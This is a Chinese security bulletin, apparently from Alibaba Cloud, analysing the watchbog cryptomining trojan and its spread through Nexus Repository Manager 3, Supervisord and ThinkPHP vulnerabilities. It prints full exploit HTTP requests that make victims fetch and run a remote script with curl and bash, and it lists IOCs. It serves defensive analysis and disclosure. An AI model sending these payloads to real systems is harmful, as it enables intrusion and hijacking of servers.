威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复...

article/2025/9/21 20:50:28

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

背景

近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件。

值得注意的是,这一攻击开始的时间(2月24日),与2月5日上述产品的母公司发布漏洞公告,相隔仅仅半个多月,再次印证了“漏洞从曝光到被黑产用于挖矿的时间越来越短”。此外,攻击者还利用了Supervisord, ThinkPHP等产品的漏洞进行攻击。

本文分析了该木马的内部结构和传播方式,并就如何清理、预防类似挖矿木马给出了安全建议。

挖矿木马传播分析

攻击者主要通过直接攻击主机服务的漏洞,来进行木马的传播,也就是说它目前不具备蠕虫的传染性,这一点上类似8220团伙。即便如此,攻击者仍然获取了大量的肉鸡。

尤其2月24日,攻击者从原本只攻击ThinkPHP和Supervisord,到加入了Nexus Repository Manager 3的攻击代码,可以看到其矿池算力当天即飙升约3倍,达到了210KH/s左右(盈利约25美元/天),意味着最高时可能有1~2万台主机受控进行挖矿。

 

v2-bae15a4ce369e3bd98309f7490f4eac8_hd.jpg

 

以下为阿里云安全采集到的3种攻击payload

(1) 针对Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)的利用

POST /service/extdirect HTTP/1.1
Host: 【victim_ip】:8081
X-Requested-With: XMLHttpRequest
Content-Type: application/json{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

(2)针对Supervisord远程命令执行漏洞(CVE-2017-11610)的利用

POST /RPC2 HTTP/1.1
Host: 【victim_ip】:9001
Content-Type: application/x-www-form-urlencoded<?xml version=\"1.0\"?>\u0002<methodCall>\u0002<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\u0002<params>\u0002<param>\u0002<string>curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby</string>\u0002</param>\u0002</params>\u0002</methodCall>

(3)针对ThinkPHP远程命令执行漏洞的利用

POST /index.php?s=captcha HTTP/1.1
Host: 【victim_host】
Content-Type: application/x-www-form-urlencoded_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

以上三种payload的目的都是相同的,那就是控制主机执行以下命令

curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

木马功能结构分析

 

v2-08989d2b3e7cf144de46a0db5187a16c_hd.jpg


被攻击的主机受控访问 https://pastebin.com/raw/zXcDajSs ,经多次跳转后,会得到如下图所示的shell脚本,其包含cronlow(), cronhigh(), flyaway()等多个函数。

v2-fcc13504d7b55dda8d998edb25a24be2_hd.jpg

 

分析后得出,该脚本主要包含以下几个模块:

1.挖矿模块

v2-f48ad5b49d0b83cd4fbd3af77c3688c8_hd.jpg

 

挖矿模块的download()函数,会从https://ptpb.pw/D8r9 (即$mi_64解码后的内容)下载由xmrig改写的挖矿程序,保存为/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog,并从https://ptpb.pw/hgZI 下载配置文件,之后启动挖矿。

另一个函数testa()也是类似,只不过它下载的是xmr-stak挖矿程序。

2.持久化模块

将要执行的恶意命令写入/etc/cron.d/root等多个文件

v2-d2fb178eabe95d4637138f509cc7322c_hd.jpg

 

3.c&c模块

c&c模块主要在dragon()和flyaway()函数中实现。

v2-b663a403e8f8d410d924ce65011255fe_hd.png

 

如下图所示为解码后的dragon函数

v2-cd1559f56dac7d1437accfefb5eb6538_hd.jpg

 

它会依次请求https://pastebin.com/raw/05p0fTYd 等多个地址,并执行收到的命令。有趣的是,这些地址目前存放的都是一些普通单词,可能是木马作者留待将来使用。

flyaway()函数则与dragon()稍有不同,它会先从https://pixeldra.in/api/download/8iFEEg 下载/tmp/elavate。

v2-184ff509018772815e0bc5b37814ffb3_hd.jpg

 

逆向可知,/tmp/elavate是使用Ubuntu本地权限提升漏洞(CVE-2017-16995)进行提权的二进制程序。提权后,尝试以root权限执行从https://pastebin.com/raw/aGTSGJJp 获取的命令。

 

v2-3e8744031efe9edc3cc3aba8aa9db260_hd.jpg

 

v2-9aebf1c4ed85a7589ef50a2dd51b4358_hd.jpg

 

安全建议

阿里云安全已和http://pastebin.com进行联系,要求禁止对上述恶意下载链接的访问,对方暂未回应。此外,云安全为用户提供如下安全建议:

  1. 互联网上攻击无处不在,用户平时应及时更新服务,或修补服务漏洞,避免成为入侵的受害者。
  2. 建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽http://pastebin.com、http://thrysi.com等广泛被挖矿木马利用的网站,达到阻断入侵的目的。
  3. 对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。

IOC

矿池地址:
http://pool.minexmr.com:443

钱包地址:
44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B

相关文件:

v2-4a254294e88234e3c72a295515c53051_hd.jpg

 

其他恶意url:
https://pastebin.com/raw/AgdgACUD
https://pastebin.com/raw/vvuYb1GC
https://pixeldra.in/api/download/nZ2s4L (用来下载32位XMR挖矿程序,链接已失效)
https://pastebin.com/raw/aGTSGJJp (目前不存在)
https://pastebin.com/raw/05p0fTYd
https://pastebin.com/raw/KxWPFeEn
https://pastebin.com/raw/X6wvuv98

Reference

  1. https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
  2. https://cloud.tencent.com/developer/article/1390628
  3. https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

 

原文链接

本文为云栖社区原创内容,未经允许不得转载。

转载于:https://my.oschina.net/u/3889140/blog/3021997


http://chatgpt.dhexx.cn/article/Crlln6WS.shtml

相关文章

威胁快报|ProtonMiner挖矿蠕虫扩大攻击面,加速传播

2019独角兽企业重金招聘Python工程师标准>>> 背景 近日&#xff0c;阿里云安全监测到一种挖矿蠕虫&#xff0c;正在互联网上加速传播。阿里云安全根据它使用ProtonMail邮箱地址作为矿池用户名的行为&#xff0c;将其命名为ProtonMiner。据分析&#xff0c;这种蠕虫与…

记一次mykings暗云挖矿木马的排查与解决

微信公众号&#xff1a;运维开发故事&#xff0c;作者&#xff1a;wanger 起因 之前有一台做测试的Windows server2012阿里云服务器的防火墙关掉之后开机总是启动&#xff0c;想了很多办法也没找到原因就提了工单问了售后&#xff0c;结果售后也没发现问题&#xff0c;并提示我…

应急响应流程以及入侵排查

归纳转载于&#xff1a; 应急响应的整体思路和基本流程 - FreeBuf网络安全行业门户不管是普通的企业&#xff0c;还是专业的安全厂商&#xff0c;都不可避免的需要掌握和运用好信息安全的知识、技能&#xff0c;以便在需要的时候&#xff0c;能够御敌千里。https://www.freebu…

阿里云服务器被挖矿程序minerd入侵的终极解决办法

突然发现阿里云服务器CPU很高&#xff0c;几乎达到100%&#xff0c;执行 top c 一看&#xff0c;吓一跳&#xff0c;结果如下&#xff1a; 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tmp/AnXqV -B -a cryptonight -o stratumtcp://xmr.crypto-pool.fr:44…

如何更有效的消灭watchdogs挖矿病毒?华为云DCS Redis为您支招

2019独角兽企业重金招聘Python工程师标准>>> 漏洞概述 近日&#xff0c;互联网出现watchdogs挖矿病毒&#xff0c;攻击者可以利用Redis未授权访问漏洞入侵服务器&#xff0c;通过内外网扫描感染更多机器。被感染的主机出现 crontab 任务异常、系统文件被删除、CPU 异…

2t3ik与ddgs挖矿病毒处理

为什么80%的码农都做不了架构师&#xff1f;>>> http://ju.outofmemory.cn/entry/351669 转载于:https://my.oschina.net/lgfei/blog/1809898

Linux 服务器上有挖矿病毒 kdevtmpfsi 如何处理?

本文转载自&#xff1a;https://my.oschina.net/u/4437985/blog/3168526 侵删 症状表现 服务器CPU资源使用一直处于100%的状态&#xff0c;通过 top 命令查看&#xff0c;发现可疑进程 kdevtmpfsi。通过 google搜索&#xff0c;发现这是挖矿病毒。 排查方法 首先&#xf…

[问题已处理]-阿里云与本地机房中挖矿病毒处理,又又又中毒了

导语&#xff1a;被挖矿的现象是cpu异常的高。正常服务被系统杀掉。 先是发现线上业务挂了。紧接着发现本地机房也挂了。判断病毒应该是由本地机房的跳板机或者开放的端口&#xff0c;或dubbo框架漏洞进来的 基本判断是confluence最新的漏洞导致的 http://www.hackdig.com/0…

IDEA连接阿里云ECS运行的docker,及处理挖矿病毒kdevtmpfsi的经历

文章目录 前置条件docker版本&#xff1a;1.13.1相关参考文章 1.修改docker相关配置1.1 修改docker配置文件1.2 重新加载配置文件1.3 重启docker 2.配置阿里云ECS开放端口23753.配置IDEA的原生插件连接Docker4.配置IDEA的AlibabaCloudToolkit插件连接Docker5.因为开放了远程连接…

【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒

文章目录 ssh暴力破解0x00 前言0x01 应急场景0x02 日志分析系统账号情况/var/log/secure/var/log/auth.log0x03 处理措施0x04 我的实战记录捕捉短连接0x00 前言0x01 应急场景0x02 分析0x03 小结挖矿病毒0x00 前言0x01 应急场景0x02 事件分析A、排查过程B、溯源分析C、清除病毒D…

某云服务器挖矿病毒查杀日记

接手的某项目部署于某云平台centos服务器上&#xff0c;由tomcat作为中间件提供应用&#xff0c;且购买了该平台的域名服务&#xff0c;从2019年底上线运营&#xff0c;一直运行比较平稳&#xff0c;可能还没正式用起来&#xff0c;用的人也不是很多吧。但凡事总有个但是&#…

记一次感染挖矿病毒的经历

2019独角兽企业重金招聘Python工程师标准>>> 下午五点十分、手机开始狂收阿里云ECS实例告警&#xff0c;所有告警都提示机器CPU满载。 迅速登录阿里云查看监控大盘&#xff0c;发现全部38台机器CPU飙升满载。第三方客户也开始在群聊里反馈接口响应慢&#xff0c;失败…

记录一次云服务器被劫持下载了挖矿病毒的处理过程

etc被篡改导致系统中病毒 起因: 一年前买的阿里云服务器 , 买了没多久 , 因为没做什么安全措施 , 然后就莫名奇妙服务器被劫持 , 在上面下载了挖矿的一些脚本 ,当时做的处理方式 简单粗暴 直接重置了我的阿里云服务器 , 并且改了密码 , 同时在阿里云的服务器控制台 -> 安全…

中了挖矿病毒

最近一台服务器运行超级慢&#xff0c;任务管理器查看CPU占用100% &#xff0c;使用autoruns.exe工具查看到异常任务和进程。 打开文件路径还发现以下文件&#xff0c;config.json , c3a.bat , wina.exe config.json 代码如下&#xff1a; {"api": {"id"…

Powershell 挖矿病毒处理与防范

最近&#xff0c;一种利用Powershell的挖矿病毒在企业网络中频繁爆发&#xff0c;该病毒其利用了WMIPowershell方式进行无文件攻击&#xff0c;并长驻内存进行挖矿。 Powershell的挖矿病毒具备无文件攻击的高级威胁外&#xff0c;还具有两种横向传染机制&#xff0c;分别为WMIE…

记云服务器中挖矿病毒与防范

文章目录 前言大致过程发现过程应对措施与防范 前言 我自己的一台腾讯云服务器还有工作室指导老师的电信云服务器都中过挖矿病毒&#xff0c;其特征都是出现CPU拉满的情况。 腾讯云 电信服务器 大致过程 发现过程 腾讯云 这是我自己的一台1核2G的服务器&#xff0c;带宽1mbps…

小程序 - 分享功能

将小程序分享至好友或者微信群&#xff0c;参考文档页面事件处理函数&#xff0c;小程序分享原来是可以监听成功分享的回调&#xff0c;但是该回调事件被微信禁用了&#xff0c;详情可查看分享功能调整 小程序分享&#xff0c;可通过右上角自带的分享按钮&#xff0c;也可以在.…

实现微信小程序分享功能

一、场景介绍 场景&#xff1a; 用户A分享小程序&#xff0c;用户B点击小程序&#xff0c;即用户A成功邀请新用户&#xff0c;用户A升级为VIP。 思路&#xff1a; 用户A分享小程序&#xff0c;用户B点击小程序&#xff0c;获取用户A提供的参数&#xff0c;并向后台发送请求&a…

uniapp微信小程序使用分享功能

实现效果为如下所示的小程序分享功能&#xff1a; 本项目是一个使用uniapp搭建的微信小程序&#xff0c;上线后点击右上角的…&#xff0c;发现其中的发送给朋友和分享到朋友圈是如下图所示的灰色不能点击&#xff1a; 那么&#xff0c;如何设置微信小程序的分享功能呢&#…

微信小程序分享朋友圈

微信小程序在基础库2.11.3之前没有分享到朋友圈的功能&#xff0c;分享的思路是用 canvas画布生成一张分享图片&#xff0c;保存到相册&#xff0c;用户将带有分享二维码的图片发到朋友圈&#xff0c;其他人可以识别图中二维码的方式进入小程序的指定分享页面。可参考智行火车票…